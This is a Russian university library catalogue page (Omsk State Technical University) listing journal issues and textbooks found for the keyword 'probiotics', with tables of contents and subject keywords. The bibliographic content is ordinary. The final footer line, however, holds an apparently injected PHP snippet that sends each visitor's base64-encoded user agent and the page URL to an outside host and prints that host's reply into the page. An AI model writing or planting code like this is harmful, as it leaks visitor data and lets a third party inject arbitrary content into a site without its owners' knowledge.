Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

411 пользователей


Зарегистрированных: 1 

Борисенко Виктория Александровна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПРОБИОТИКИ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 10
1. 
Пищевая промышленность. - Журнал, 2007г. № 1
Оглавление 
  • Арсеньева, Т. П. Основные вещества для обогащения продуктов питания / Т. П. Арсеньева, И. В. Баранова. - с.6-8
    Кл. слова: ВИТАМИНЫ - ПИТАНИЕ, ВОЛОКНО ПИЩЕВОЕ, ПРОБИОТИКИ
  • Шишков, Ю. И. Некоторые аспекты продуктов функционального питания / Ю. И. Шишков. - с.10-11
    Кл. слова: ПИТАНИЕ ФУНКЦИОНАЛЬНОЕ
  • Ипатова, Л. Г. Новые направления в создании функциональных жировых продуктов / Л. Г. Ипатова, А. А. Кочеткова, А. П. Нечаев. - с.12-14
    Кл. слова: ПРОДУКТ ЖИРОВОЙ
  • Функциональные комбинированные молочные напитки / ; Е. Е. Курчаева, И. В. Максимов, В. И. Манжесов, О. В. Столяров. - с.16-17
    Кл. слова: НАПИТОК МОЛОЧНЫЙ
  • Ломачинский, В. А. Новые функциональные плодоовощные продукты / В. А. Ломачинский. - с.18-19
    Кл. слова: КОНСЕРВЫ ПЛОДООВОЩНЫЕ
  • Макаров, В. Н. Продукты питания функционального назначения на плодоовощной основе / В. Н. Макаров, Л. Н. Влазнева. - с.20-21
  • Сулимина, О. Г. Леденцы функционального назначения / О. Г. Сулимина. - с.24
  • Жирард, К. Добавьте немного цвета в полезные для здоровья снеки / К. Жирард. - с.26-27
  • Доронин, А. Ф. Функциональные продукты длительного хранения / А. Ф. Доронин, Т. И. Изотова, П. А. Двоеносова. - с.28-29
  • Аналитические исследования структуры питания студентов / ; Е. И. Титов, Л Ф. Митасева, И. В. Глазкова, М. А. Никитина. - с.30-31
    Кл. слова: ПИТАНИЕ СТУДЕНТОВ
  • Итоги работы предприятий пищевой и перерабатывающей промышленности России за январь-октябрь 2006 года. - с.36-37
    Кл. слова: ПРОМЫШЛЕННОСТЬ ПЕРЕРАБАТЫВАЮ, ПРОМЫШЛЕННОСТЬ ПИЩЕВАЯ - СТА
  • Кудрявцев, В. В. Проблемы реализации Национального проекта развития АПК / В. В. Кудрявцев. - с.42-43
  • Сидоров, А. Н. Научные предпосылки реструктуризации системы управления организациями / А. Н. Сидоров. - с.44-45
    Кл. слова: СИСТЕМА УПРАВЛЕНИЯ ПРЕДПРИЯТ
  • Касьяненко, А. Перспективы повышения качества российского продовольствия (на основе опыта канадской системы пищевой безопасности) / А. Касьяненко, С. Оболенский, С. Джойл. - с.64-65
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН
Держатели документа (Информация об экземплярах) 
2. 
Вопросы питания. - Журнал, 2009г. № 2
Оглавление 
  • Нанотехнологии в пищевых производствах: перспективы и проблемы. - с.4-17
    Кл. слова: НАНОМАТЕРИАЛ, БИОДОСТУПНОСТЬ, БИОБЕЗОПАСНОСТЬ
  • Ускова, М. А. Антиоксидантные эффекты молочнокислых бактерий - пробиотиков и йогуртовых заквасок / М. А. Ускова, Л. В. Кравченко. - с.18-23
    Кл. слова: ПРОБИОТИКИ, БАКТЕРИИ молочнокислые, антиоксиданты
  • Медико-биологическая оценка безопасности генно-инженерно-модифицированной кукурузы линии MIR604. - с.24-32
    Кл. слова: КУКУРУЗА генно-модифицированная, MIR 604
  • Токаев, Э. С. Разработка нового синбиотического пищевого продукта с высоким содержанием бифидобактерий / Э. С. Токаев, А. А. Максимов. - с.39-41
    Кл. слова: экстракт дрожжевой, БИФИДОБАКТЕРИЯ
  • Влияние плесневых грибов, потребляемых с пищей, на кишечную микрофлору у крыс. - с.42-46
    Кл. слова: МИКРОФЛОРА
  • Активность пищеварительных ферментов у потомства крыс, получавших во время лактации рацион, контаминированный тяжелыми металлами. - с.47-50
    Кл. слова: ЛАКТАЦИЯ, МЕТАЛЛЫ ТЯЖЕЛЫЕ
  • Конденцова, В. М. О рекомендуемых нормах потребления витаминов A, E, C и B2 / В. М. Конденцова, О. А. Вржесинская. - с.51-56
    Кл. слова: ВИТАМИНЫ - ПИТАНИЕ
  • Влияние гипокалорийной диеты, обогащенной биологически активными веществами c антиоксидантным действием, на клинико-метаболические показатели у больных сахарным диабетом типа 2. - с.57-62
    Кл. слова: ДИАБЕТ САХАРНЫЙ, АНТИОКСИДАНТЫ, ДИЕТА ГИПОКАЛОРИЙНАЯ
  • Коркин, А. Л. Влияние празиквантела и препарата, содержащего урсодезоксихолевую кислоту, на литогенные свойства желчи у больных с опистархозом на фоне основного варианта стандартной диеты / А. Л. Коркин. - с.63-66
    Кл. слова: опистархоз, КИСЛОТА урсодезоксихолевая
  • Вировец, О. А. О повышенных потерях макро- и микроэлементов при занятии спортом и целесообразности их компенсации биологически активными добавками / О. А. Вировец. - с.67-72
    Кл. слова: ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА, СПОРТ - питание
  • Теоретические предпосылки к разработке индивидуального питания спортсменов. - с.73-76
    Кл. слова: СПОРТ - ПИТАНИЕ
  • Макаров, В. Н. Получение низкокалорийных фруктовых компотов с применением натуральных подсластителей / В. Н. Макаров. - с.77-78
    Кл. слова: КОМПОТ, ПОДСЛАСТИТЕЛЬ натуральный
Держатели документа (Информация об экземплярах) 
3. 
Пищевые ингредиенты: сырье и добавки. - Журнал, 2005г. № 2
Оглавление 
  • Шатнюк, Л. Н. Пищевые микроингредиенты в создании продуктов здорового питания / Л. Н. Шатнюк. - с.18-22
  • Шендеров, Б. А. Пробиотики, пребиотики и синбиотики. Общие и избранные разделы проблемы / Б. А. Шендеров. - с.23-26
  • Нилов, Д. Ю. Современное состояние и тенденции развития рынка функциональных продуктов питания и пищевых добавок / Д. Ю. Нилов, Т. Э. Некрасова. - с.28-30
    Кл. слова: ДОБАВКА ПИЩЕВАЯ
  • Бакулина, О. Н. Функциональные ингредиенты для воплощения Концепции здорового питания / О. Н. Бакулина, О. В. Бзюк. - с.30,32
  • Титов, В. Н. Жирные кислоты, холестерин и атеросклероз / В. Н. Титов. - с.36-38
  • Шахнович, Л. Л. Вакамэ - диетический продукт и натуральный источник полезных микронутриентов / Л. Л. Шахнович. - с.40-41
    Кл. слова: ВОДОРОСЛИ МОРСКИЕ
  • Драчева, Л. В. Биотехнология морепродуктов для здоровья человека / Л. В. Драчева. - с.42
  • Скобельская, З. Г. Молочный йодированный белок - перспективное направление в решении проблемы йодного дефицита / З. Г. Скобельская, Г. Ф. Жукова, Е. К. Никифорова. - с.44
  • Паронян, В. Х. Жировые продукты функционального назначения / В. Х. Паронян, К. Г. Восканян. - с.45
  • Козлов, С. Г. Технологические аспекты переработки сыворотки в дисперсные продукты нового поколения / С. Г. Козлов, А. М. Попов. - с.48-50
  • Добровольский, В. Ф. Пищевые концентраты и продукты специального назначения: наука и практика / В. Ф. Добровольский. - с.52-53
    Кл. слова: КОНЦЕНТРАТ ПИЩЕВОЙ
  • Кулев, Д. Х. Развитию производства пищевых добавок - научное обеспечение / Д. Х. Кулев. - с.54-55
    Кл. слова: ДОБАВКА ПИЩЕВАЯ - производство
  • Кулев, Д. Х. Нормативная база производства пищевых добавок, их классификация и кодирование / Д. Х. Кулев. - с.64-66
    Кл. слова: ДОБАВКА ПИЩЕВАЯ - производство
  • Смирнов, Е. В. Законодательство в области ароматизаторов за рубежом и в России / Е. В. Смирнов. - с.67-72
    Кл. слова: АРОМАТИЗАТОР - право
  • Молин, Р. Белковые гидролизаты в пищевых продуктах / Р. Молин, Я. Панек, М. Миахара. - с.74-77
  • Чулкова, Н. А. Новые белкосодержащие добавки "ЛАКСА- про" / Н. А. Чулкова. - с.78-79
  • Кулакова, А. В. Генотоксическое изучение природного подсластителя "Sweta" / А. В. Кулакова, Н. О. Даугель-Дауге, А. Д. Дурнев. - с.80-83
  • Базарнова, Ю. Г. Применение натуральных гидроколлоидов для стабилизации пищевых продуктов / Ю. Г. Базарнова, Т. В. Шкотова, В. М. Зюканов. - с.84-87
  • Сравнительная характеристика структурообразователей углеводной природы / ; А. А. Кожухова, Н. В. Чернега, Т. В. Бархатова, Л. К. Петриченко. - с.88-89
  • Кулиев, Н. Ш. Структура мягкого мороженого с фруктово-овощными стабилизаторами / Н. Ш. Кулиев, З. М. Амонова. - с.92
  • Эмульгаторы для кондитерской промышленности. - с.94
Держатели документа (Информация об экземплярах) 
4. 
Пищевые ингредиенты: сырье и добавки. - Журнал, 2006г. № 2
Оглавление 
  • Андреенкова, В. А. Мясные продукты с увеличенным сроком годности / В. А. Андреенкова, Л. В. Алехина, Е. В. Мансветова. - с.16-17
  • Шубина, О. Г. Пищевые ингредиенты как замена сахара / О. Г. Шубина. - с.24-27
    Кл. слова: ПОДСЛАСТИТЕЛЬ, САХАРОЗАМЕНИТЕЛЬ
  • Макинтайр, М. Ингредиенты и анализ пищевых продуктов / М. Макинтайр. - с.28-29
  • Моурик, С. В. ван "Аспасвит": 10 лет мы делаем жизнь слаще! / С. В. ван Моурик. - с.30-31
  • Кузнецова, Л. С. Новое поколение комплексных добавок для антимикробной защиты мясной продукции / Л. С. Кузнецова, Н. В. Михеева. - с.32-33
  • Доценко, Е. В. Жиры - альтернативы масла какао для кондитерской промышленности, поставляемые компанией "Масло база" / Е. В. Доценко. - с.36
  • Бок, С. Дифференцирование через инновацию / С. Бок. - с.38-40
    Кл. слова: ПРОДУКТ ПИЩЕВОЙ ИННОВАЦИОННЫЙ
  • Смирнов, Е. В. Композиционные ароматизаторы / Е. В. Смирнов. - с.42-46
  • Капрельянц, Л. В. Ферменты в пищевых технологиях: вчера, сегодня, завтра / Л. В. Капрельянц. - с.48-51
  • Дик, Э. Желатин: свойства, особенности, функции / Э. Дик, Е. В. Овсянникова. - с.52-57
  • Векуа, Дж. "Путешествие в мир Вкуса и Аромата" / Дж. Векуа. - с.58-59
    Кл. слова: АРОМАТИЗАТОР
  • Бакланов, А. А. Дрожжевые экстракты DSM. Новые тенденции и мировой опыт / А. А. Бакланов. - с.60-61
  • Тимошенко, Ю. А. ЛециПРО - новый бренд растительных лецитинов / Ю. А. Тимошенко, Е. Б. Федорова, А. В. Гудзь. - с.62-63
  • Рыжова, Н. В. Современные натуральные красители / Н. В. Рыжова. - с.64
  • Молин, Р. Технологические ароматизаторы / Р. Молин, Я. Панек. - с.66-67
  • Панфилова, М. Н. Ксантановая камедь. Преимущества и особенности применения / М. Н. Панфилова. - с.70
  • Амерханова, А. М. Пробиотики и пребиотики для продуктов функционального питания / А. М. Амерханова. - с.74-75
  • Николэй, К. Для хорошего самочувствия просто добавьте пребиотики! / К. Николэй. - с.76-77
  • Рогов, И. А. Нанотехнология биопрепарата "Милканг" на основе глубокой переработки молочного сырья / И. А. Рогов, Е. И. Титов, Н. А. Тихомирова. - с.78-80
Держатели документа (Информация об экземплярах) 
5. 
Пищевая промышленность. - Журнал, 2010г. № 7
Оглавление 
  • Растительные пищевые композиты полифункционального назначения. - с.8-11
  • Итоги работы предприятий пищевой и перерабатывающей промышленности России за январь-апрель 2010 г.. - с.6-7
  • Гваладзе, Г. Д. Безотходная комплексная технология переработки плодов граната / Г. Д. Гваладзе. - с.12-13
  • Речкина, Е. А. Пектин хвои. Оценка безопасности / Е. А. Речкина, Г. А. Губаненко, Л. П. Рубчевская. - с.13-14
  • Повышение эффективности технологии переработки вторичного сырья. - с.15
  • Забалуева, Ю. Ю. Использование белково-жировой эмульсии при производстве полуфабрикатов в тестовой оболочке / Ю. Ю. Забалуева, Н. В. Колесникова, Л. Г. Чойбонова. - с.16-17
  • Чечина, О. Н. Перспективы утилизации пивной дробины / О. Н. Чечина, А. В. Зюзина, А. В. Зимичев. - с.17-19
  • Высокотемпературная переработка пищевых отходов. - с.20-21
  • Очистка жомопрессовой воды от микробной загрязненности. - с.22-23
  • Морозова, А. А. Регулирование содержания токсических компонентов в дыме сигарет с фильтром / А. А. Морозова, М. В. Шкидюк, О. К. Бедрицкая. - с.23-24
  • Драчева, Л. В. Биотехнология и экология крупных городов / Л. В. Драчева. - с.25
  • Елисеева, Т. В. Модель оптимизации нормативов ипотечного кредитования / Т. В. Елисеева. - с.26-28
  • Носкова, Г. Н. Вольтамперометрический метод для контроля и безопасности пищевых продуктов / Г. Н. Носкова. - с.30-32
  • Подкопаев, Д. О. Метод ЭПР-спектрометрии для исследования биологических объектов и продуктов питания / Д. О. Подкопаев. - с.33-34
  • Дубинин, А. В. Пробиотики или пребиотики: стратегия выбора / А. В. Дубинин. - с.35
  • Бакуменко, О. Е. Современные подходы к организации оптимального питания учащейся молодежи / О. Е. Бакуменко, А. Ф. Доронин. - с.36-38
  • Вовк, А. Правильные роллы и японская кухня / А. Вовк. - с.39
  • Кадникова, И. А. Оптимизация процесса модификации полисахаридов морского растительного сырья / И. А. Кадникова, В. А. Бураго. - с.40-43
  • Макарова, Н. В. Сравнительная характеристика антиоксидантных свойств экстрактов овощей / Н. В. Макарова, В. П. Бординова. - с.44-46
  • Лейба, А. А. Белгородский активизированный мел - инновационная пищевая добавка / А. А. Лейба. - с.46-48
  • [Новости НИИ и вузов]. - с.49
  • [Новости компаний]. - с.50-51
  • [Новости отраслевых союзов]. - с.52-53
  • Найди свой вкус с "Тереза Интер"!. - с.54-55
  • Московскому государственному университету прикладной биотехнологии - 80 лет!. - с.56-58
  • Драчева, Л. В. Тенденции и новации в мире HoReCa-2010 / Л. В. Драчева. - с.59
  • Драчева, Л. В. Аналитика Экспо-2010 / Л. В. Драчева. - с.60-61
  • IFFA - ведущая международная выставка мясной промышленности. - с.61
  • Открытие завода по производству консервов. - с.62-63
  • ЭКВАТЭК-2010 - "Вода: экология и технология". - с.63
6. 
Орехов С. Н. Биотехнология [Текст] / С. Н. Орехов, И. И. Чекалева ; ред. А. В. Катлинский, 2014. - 282 с.
Ключевые слова 
БИООБЪЕКТ -- ГЕНОМИКА -- ГЕНОМ ЧЕЛОВЕКА -- ПРОТЕОМИКА -- ОЛИГОНУКЛЕОТИДЫ АНТИСМЫСЛОВЫЕ -- БОЛЕЗНЬ КОНФОРМАЦИОННАЯ -- РЕГУЛЯЦИЯ ВНУТРИКЛЕТОЧНАЯ -- ПРОИЗВОДСТВО БИОТЕХНОЛОГИЧЕСКОЕ -- ПРОЦЕСС БИОТЕХНОЛОГИЧЕСКИЙ -- БИОСИНТЕЗ -- КОНТРОЛЬ КАЧЕСТВА ЛЕКАРСТВЕННЫХ СРЕДСТВ -- БИОТЕХНОЛОГИЯ ЭКОЛОГИЧЕСКАЯ -- БИОТЕХНОЛОГИЯ ЧАСТНАЯ -- АНТИБИОТИКИ -- СТЕРОИДЫ -- ВИТАМИНЫ -- АМИНОКИСЛОТА -- ПРОБИОТИКИ -- ФЕРМЕНТЫ -- БИОТЕХНОЛОГИЯ ЛЕКАРСТВЕННЫХ СРЕДСТВ -- ИММУНОБИОТЕХНОЛОГИЯ ЛЕКАРСТВЕННЫХ СРЕДСТВ
Держатели документа (Информация об экземплярах) 
7. 
Экспертиза специализированных пищевых продуктов. Качество и безопасность [Текст] : учеб. пособие: гриф-МО для студ. вузов по спец. "Товароведение и экспертиза товаров" / [Л. А. Маюрникова и др.] ; под общ. ред. В. М. Позняковского, 2012. - 424 с.
Держатели документа (Информация об экземплярах) 
8. 
Технологии пищевых производств [Текст] : учеб. для студентов высш. учеб. заведений / под общ. ред. А. П. Нечаева, 2005. - 767 с.
Ключевые слова 
ПИТАНИЕ - ЗДОРОВЬЕ -- ПИТАНИЕ НАСЕЛЕНИЯ -- ПРОДУКТЫ ПИЩЕВЫЕ -- БЕЛКИ - ПИТАНИЕ -- ЛИПИДЫ - ПИТАНИЕ -- УГЛЕВОДЫ - ПИТАНИЕ -- ВИТАМИНЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАН -- ВОДА - ПИТАНИЕ -- ПРОИЗВОДСТВО ПИЩЕВОЕ -- СТАНДАРТИЗАЦИЯ ПРОДУКЦИИ ПИЩ -- СЕРТИФИКАЦИЯ ПИЩЕВЫХ ПРОДУКТ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- СЫРЬЕ ПИЩЕВОЕ -- ЗЕРНО - ПРОИЗВОДСТВО -- солод -- КРАХМАЛ - ПРОИЗВОДСТВО -- САХАР - ПРОИЗВОДСТВО -- МУКА ПШЕНИЧНАЯ - ГОСТ -- МОЛОКО - производство -- ЯЙЦЕПРОДУКТЫ -- ДОБАВКА ПИЩЕВАЯ -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- БАД -- ПРОБИОТИКИ -- ТЕХНОЛОГИЯ ПРОДУКЦИИ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- МАСЛО РАСТИТЕЛЬНОЕ -- ЖИРЫ - производство -- ПИВО - производство -- КВАС -- ДРОЖЖИ - производство -- кислота лимонная -- УКСУС -- КИСЛОТА молочная -- КОНЬЯК - производство -- ВИНОДЕЛИЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- КОНСЕРВЫ ОВОЩНЫЕ - ПРОИЗВОДС -- КОНСЕРВЫ ПЛОДООВОЩНЫЕ -- ЧАЙ - производство
Держатели документа (Информация об экземплярах) 
9. 
Синбиотики в технологии продуктов питания [Текст] / И. А. Рогов, 2006. - 217 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
10. 
Артюхова, Светлана Ивановна. Основы пищевой биотехнологии и нанотехнологии [Текст] : учеб. пособие / С. И. Артюхова, Ю. А. Гаврилова, 2010. - 310 с.
Оглавление 
Держатели документа (Информация об экземплярах) 

В учебном пособии изложены основы пищевой биотехнологии и нанотехнологии.

Полный текст


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2839 - 19.03.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.23 с.22 запросов, 0.78c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;